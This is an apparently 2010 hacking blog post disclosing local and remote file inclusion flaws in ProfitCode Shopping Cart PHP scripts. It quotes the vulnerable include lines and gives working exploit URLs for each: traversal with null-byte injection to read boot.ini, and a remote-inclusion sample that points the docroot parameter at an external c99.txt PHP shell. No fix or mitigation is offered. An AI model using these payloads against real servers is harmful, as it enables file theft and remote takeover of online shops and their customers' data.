ProfitCode Shopping Cart Multiple LFI/RFI Vulnerabilities
January 13, 2010, 10:54 am
Filed under: Hack | Tags: bot, exploits, Hack, hacking, LFI, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
Filed under: Hack | Tags: bot, exploits, Hack, hacking, LFI, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
- There are Cople of pages that has the LFI vuln
Vuln c0de : dl-authcontent.php |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
$returlvar = "dloads"; |
include "$docroot" . "tplates/usrauthlogin.php"; |
exit; |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
Exploit : |
http://server/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=[LFI] |
Sample : |
http://server/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../boot.ini%00 |
*************************************************************************************************** |
vuln c0de : dl-maincatsearch-dlcontent.php |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
include("$docroot" . "shopincs/catpgtop$langFile.php"); |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
Exploit |
http://server/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=[LFI] |
Sample |
http://server/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=../../../../../boot.ini%00 |
Vuln c0de : dloads-payed.php |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
include "$docroot" . "tplates/usrauthlogin.php"; |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
Exploit |
http://server/store/dloads/dloadstplates/dloads-payed.php?docroot=[LFI] |
Sample |
http://server/store/dloads/dloadstplates/dloads-payed.php?docroot=.../../../../../../../../boot.ini%00 |
************************************************************************ |
- For Some resons this comeup with a RFI |
Vuln c0de : dloads-header.php |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
include "$docroot" . "dloads/dloadsmainincs/inc-dloadsfunctions.php"; |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
Exploit |
http://server/store/dloads/dloads-header.php?docroot=[RFI] |
Sample |
http://server/store/dloads/dloads-header.php?docroot=http://www.cfsm.cn/c99.txt?%00 |
Advertisement
Comments Off
